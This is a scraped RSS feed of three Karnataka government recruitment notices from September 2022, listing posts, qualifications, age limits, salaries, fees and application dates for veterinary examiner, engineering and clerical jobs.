AHVS KARNATAK A Recruitment 2022 http://whatsappgroups.org/?p=923 http://whatsappgroups.org/?p=923#respond Thu, 29 Sep 2022 09:11:40 +0000 https://whatsappgroups.org/?p=923 AHVS Karnatak Government Recruitment 2022 Appointment of Junior Medical Examiners No of posts 250 Educational QualificationAnimal husbandary Diplamo/Dairy/Poultry Joc Pass Apply online Apply from 5/10/2022 to 4/11/2022 Last date for payment of fees 6/10/2022 Age limitGm 35 yearsOBC 38 yearsSC sT 40years Salary Rs.21400to 42000Fees Rs.750 and for SC and sT no fees Selection by […]]]>

AHVS Karnatak Government Recruitment 2022

Appointment of Junior Medical Examiners

No of posts 250

Educational Qualification
Animal husbandary Diplamo/Dairy/Poultry Joc Pass

Apply online

Apply from 5/10/2022 to 4/11/2022

Last date for payment of fees 6/10/2022

Age limit
Gm 35 years
OBC 38 years
SC sT 40years

Salary Rs.21400to 42000
Fees Rs.750 and for SC and sT no fees

Selection by Written test and personal interview

Upload ur certificates and photo

Download

]]>
http://whatsappgroups.org/?feed=rss2&p=923 0
Karnataka Public Service Commission Recruitment 2022 http://whatsappgroups.org/?p=919 http://whatsappgroups.org/?p=919#respond Wed, 28 Sep 2022 14:56:46 +0000 https://whatsappgroups.org/?p=919 Karnataka Public Service CommissionAsst Executive Engineers Recruitment 2022 No of Posts 25Qualificationan Engineering Degree in Civil Engineering/EnvironmentalEngineering/Construction Engineering/Management Age limit18 to 35 years for General meritscheduled Caste 38 yearsST 40 years SalaryRS.52650 to Rs.97100Apply on line Exam fees Gm Rs.600 SC Rs.300 and others ST and Physically handicapped Rd.35/- SelectionThrough Competitive Examination Last date for […]]]>

Karnataka Public Service Commission
Asst Executive Engineers Recruitment 2022

No of Posts 25
Qualification
an Engineering Degree in Civil Engineering/Environmental
Engineering/Construction Engineering/Management

Age limit
18 to 35 years for General merit
scheduled Caste 38 years
ST 40 years

Salary
RS.52650 to Rs.97100
Apply on line

Exam fees Gm Rs.600 SC Rs.300 and others ST and Physically handicapped Rd.35/-

Selection
Through Competitive Examination Last date for submission 19/10/2022

DOWNLOAD

]]>
http://whatsappgroups.org/?feed=rss2&p=919 0
Karnataka State Water Sources Department Recruitment 2022 http://whatsappgroups.org/?p=892 http://whatsappgroups.org/?p=892#respond Wed, 28 Sep 2022 08:49:32 +0000 https://whatsappgroups.org/?p=892 Karnataka water Resource Department Recruitment 2022

Name of the post
SDA Second Division Assistant

No of posts 155

Qualification
Puc and Diplamo in ITI

Age limit

18 to 40years
Apply on line. Along with Sslc and other marks cards and certificate s and make scan

Selection will be made through merit basis

Last date for submission of application

19/10/2022

Download

]]>
http://whatsappgroups.org/?feed=rss2&p=892 0